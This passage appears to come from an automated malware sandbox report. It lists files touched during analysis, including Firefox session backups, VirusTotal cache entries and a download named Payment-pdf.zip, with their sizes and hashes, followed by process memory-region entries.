                                                            6bcb0c778e09133e3bf40b45eda55f98bfdec5d5

                                                            SHA256

                                                            09423b681183673a8a3a3767dc2800db5df5e015a67dac35d368da830b80d738

                                                            SHA512

                                                            02b6d92ff932bb9e92cacee8572c46a5f4e67ba4014a8d42cf44afcd470e1072aef2c6cf18a20b01de35dee60358dc32bcd0267199dca8e5bae6c1a3bda05d1f

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\on1px6pk.default-release\sessionstore-backups\recovery.jsonlz4

                                                            Filesize

                                                            4KB

                                                            MD5

                                                            5bfec2c5dd20edfc82b2f33484c29885

                                                            SHA1

                                                            a1a67b4b9cc41818ebfb33cca7f55e66ca00b459

                                                            SHA256

                                                            cffaa994bf33723442578d0e593c4819a0ecb4db97b138ddb5bb5ed9f35edcb3

                                                            SHA512

                                                            3dfa7f492a571073e5095029bfe9f94ca67513e17976c997fb1e6d225728cb06360475d37d3e3cddb820e38bc72490590e1241d3f0d6e0487916ac6c08502ec9

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\on1px6pk.default-release\sessionstore-backups\recovery.jsonlz4

                                                            Filesize

                                                            4KB

                                                            MD5

                                                            ab00f116b93b5de19e635110b4b56a5a

                                                            SHA1

                                                            e4d0e53377147897a282251badb1a2964e5844fb

                                                            SHA256

                                                            b82b6977b529be8c90f51802b609c7b20d470f594443449e07c2aaa41dcf4393

                                                            SHA512

                                                            2be4d156b36cd3166ede7e8935b0a931ec0ca7a1af2316dd220b4d06ffa10a609b516f745c6ebc11614d82483d861bc26248b6542d221084c62ce6de436e9985

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\on1px6pk.default-release\sessionstore-backups\recovery.jsonlz4

                                                            Filesize

                                                            3KB

                                                            MD5

                                                            e115b7482a597d7eedcc8f687fb6c84d

                                                            SHA1

                                                            9a19762ef7db4cdb8b72f0a66ab5a601de66d477

                                                            SHA256

                                                            3f290c63a89a968da59090f69daf253f3369a2a9846828db33d8a05a207fe3d3

                                                            SHA512

                                                            3772aade39e2e8ef5b14e55b8320482a3432fe5c25e26ae474f938aad4bbeb021e0134565ca43d93ac4a3a29cfc8f7f0e8aaa5b1399a57b481dd76ecc1fc3d0b

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\on1px6pk.default-release\sessionstore-backups\recovery.jsonlz4

                                                            Filesize

                                                            3KB

                                                            MD5

                                                            685f4b0fe5691145c6dda003115237e3

                                                            SHA1

                                                            68d7534b0420e28c194d777b2cc219b6034a3f1b

                                                            SHA256

                                                            ad6a4c8fb5a12e061fd56e614ac6a2ef45f169846d6335d9d0929437bc069c41

                                                            SHA512

                                                            762789a206811bc3491a8fdcecff3e92a7c5026a7cb729338dc7b77fce808e2a71d0ad8402fbdc388fe79e8d0b1eb7aa74015aae443fbdc6c3df1c6a545c74b9

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\on1px6pk.default-release\sessionstore-backups\recovery.jsonlz4

                                                            Filesize

                                                            4KB

                                                            MD5

                                                            a48a55d2b3c3b4a3134639bd121aaa43

                                                            SHA1

                                                            d9a9a524442078b1690235f18ecbf6f0c64f0c21

                                                            SHA256

                                                            2b2d97d46f8d63b2e1888b224f24d47b5f5f6a265120cba3c76410f69ba12a0b

                                                            SHA512

                                                            bd69dfd8ab6dcb1f39f667a587aa4b8d943564c0e455d37f9fa91004d988342b10f3ed995459f665c4ab5365c98b0c26d1f412f2c67423d756020c794875a889

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\on1px6pk.default-release\sessionstore-backups\recovery.jsonlz4

                                                            Filesize

                                                            4KB

                                                            MD5

                                                            2c1748e20cda9a1834cf7491d7c72f05

                                                            SHA1

                                                            06912ca4f35efeb42bca37a851f6ba77ceca9401

                                                            SHA256

                                                            d055358f4691dd5059dfc45e449479025f213ab00602eafd74e11dcb93cb87da

                                                            SHA512

                                                            e8835f77802010b3c9fe37bf55eea28aca442b2d1958c7865fbb22206c106050cfc6a4e98945b0bb7884aca96f13f8732fb57fe0e6e8d6b93c1bd079c7072aa2

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\on1px6pk.default-release\storage\default\https+++www.virustotal.com\cache\morgue\214\{dde5d243-e7db-4571-819e-3362793603d6}.final

                                                            Filesize

                                                            47KB

                                                            MD5

                                                            9ac7929d62e524df66221a136ca1ba52

                                                            SHA1

                                                            72dc9ef2723ed6989f3c05e23cb2de7c45bd881a

                                                            SHA256

                                                            9a45e3e2285c7a3351a0b546cf1b9bdf61d6453694203064d9a8488d31746390

                                                            SHA512

                                                            e0ff113c6ccbfa3d3c0bfa8b0a53929fba730c3bbfbf904be12be1f9fa6f8406cae938d85eebbdd38e13aa4ccf2d96e01051020765949a400744b8a1d1600f9e

                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\on1px6pk.default-release\storage\default\https+++www.virustotal.com\cache\morgue\250\{07c2ffc7-73a2-4352-b605-71003e56adfa}.final

                                                            Filesize

                                                            47KB

                                                            MD5

                                                            417f5f2c5ed4ac701ab35a36a34f43c8

                                                            SHA1

                                                            2842b2541bab6e0cfccff6cb75f152c9f8295ead

                                                            SHA256

                                                            5c1a335982dc92357346a233f711788b51c31a68b9ca5b5c27a69df920b6fa50

                                                            SHA512

                                                            70cc404fdf6958ed4eb059b5a8f5c167e52bc5470d579282d5a22a4b48945bd482ea5f5c54c8b3ce49b5815dce66c8fb39f8c42676a4f6da43068e50ba4be6d7

                                                          • C:\Users\Admin\Downloads\Payment-pdf.zip

                                                            Filesize

                                                            3KB

                                                            MD5

                                                            477020332e79449c419c34b28dc5b486

                                                            SHA1

                                                            ba9c824fbbee7332112b88bdb825ce4c4528d0f5

                                                            SHA256

                                                            e076bd94ee05078f4cc63fea56ea5452c4ea5319c991463a4468cdb6eeb300d1

                                                            SHA512

                                                            4fd71e5d9b0df05520d41302baaf0aca82e0ea38f04ccadc902693d2c95722812310ad56922345bf0efda1c449e43ebe6c929410b1df3f2962a57c02c96fe33e

                                                          • memory/372-202-0x00007FFAAAAF0000-0x00007FFAAB5B1000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/372-140-0x000001EEF3440000-0x000001EEF3700000-memory.dmp

                                                            Filesize

                                                            2.8MB

                                                          • memory/372-203-0x000001EEE2EA0000-0x000001EEE2EB0000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/372-253-0x000001EEE2EA0000-0x000001EEE2EB0000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/372-256-0x00007FFAAAAF0000-0x00007FFAAB5B1000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/372-112-0x00007FFAAAAF0000-0x00007FFAAB5B1000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/372-113-0x000001EEE2EA0000-0x000001EEE2EB0000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/372-204-0x000001EEE2EA0000-0x000001EEE2EB0000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/372-114-0x000001EEE2EA0000-0x000001EEE2EB0000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/820-247-0x00007FFAAAAF0000-0x00007FFAAB5B1000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/820-248-0x0000020FC9770000-0x0000020FC9780000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/820-249-0x0000020FC9770000-0x0000020FC9780000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/820-358-0x00007FFAAAAF0000-0x00007FFAAB5B1000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/820-172-0x00007FFAAAAF0000-0x00007FFAAB5B1000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/820-173-0x0000020FC9770000-0x0000020FC9780000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/820-183-0x0000020FC9770000-0x0000020FC9780000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/2000-157-0x00007FFAAAAF0000-0x00007FFAAB5B1000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/2000-158-0x000001D1E8BF0000-0x000001D1E8C00000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/2000-159-0x000001D1E8BF0000-0x000001D1E8C00000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/2000-171-0x00007FFAAAAF0000-0x00007FFAAB5B1000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/2420-207-0x0000023CDF7C0000-0x0000023CDF7D0000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/2420-206-0x00007FFAAAAF0000-0x00007FFAAB5B1000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/2420-218-0x00007FFAAAAF0000-0x00007FFAAB5B1000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/3760-220-0x000001D3CCEB0000-0x000001D3CCEC0000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/3760-116-0x00007FFAAAAF0000-0x00007FFAAB5B1000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/3760-117-0x000001D3CCEB0000-0x000001D3CCEC0000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/3760-127-0x000001D3CCEB0000-0x000001D3CCEC0000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/3760-205-0x00007FFAAAAF0000-0x00007FFAAB5B1000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/3760-266-0x00007FFAAAAF0000-0x00007FFAAB5B1000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/3760-219-0x000001D3CCEB0000-0x000001D3CCEC0000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/3780-240-0x000001D2D6F00000-0x000001D2D6F10000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/3780-260-0x000001D2D6F00000-0x000001D2D6F10000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/3780-136-0x000001D2D6F00000-0x000001D2D6F10000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/3780-128-0x00007FFAAAAF0000-0x00007FFAAB5B1000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/3780-239-0x00007FFAAAAF0000-0x00007FFAAB5B1000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/3780-241-0x000001D2D6F00000-0x000001D2D6F10000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/3780-263-0x00007FFAAAAF0000-0x00007FFAAB5B1000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/3780-135-0x000001D2D6F00000-0x000001D2D6F10000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/3924-102-0x0000021754970000-0x0000021754980000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/3924-200-0x0000021754970000-0x0000021754980000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/3924-199-0x00007FFAAAAF0000-0x00007FFAAB5B1000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/3924-259-0x00007FFAAAAF0000-0x00007FFAAB5B1000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/3924-201-0x0000021754970000-0x0000021754980000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/3924-101-0x0000021754970000-0x0000021754980000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/3924-100-0x00007FFAAAAF0000-0x00007FFAAB5B1000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/3924-99-0x0000021754BE0000-0x0000021754C02000-memory.dmp

                                                            Filesize

                                                            136KB

                                                          • memory/4332-143-0x000001F8726F0000-0x000001F872700000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/4332-141-0x00007FFAAAAF0000-0x00007FFAAB5B1000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/4332-142-0x000001F8726F0000-0x000001F872700000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/4332-156-0x00007FFAAAAF0000-0x00007FFAAB5B1000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/4872-185-0x00007FFAAAAF0000-0x00007FFAAB5B1000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/4872-251-0x0000019474C20000-0x0000019474C30000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/4872-250-0x00007FFAAAAF0000-0x00007FFAAB5B1000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/4872-355-0x00007FFAAAAF0000-0x00007FFAAB5B1000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/4872-252-0x0000019474C20000-0x0000019474C30000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/4872-352-0x0000019474C20000-0x0000019474C30000-memory.dmp

                                                            Filesize

                                                            64KB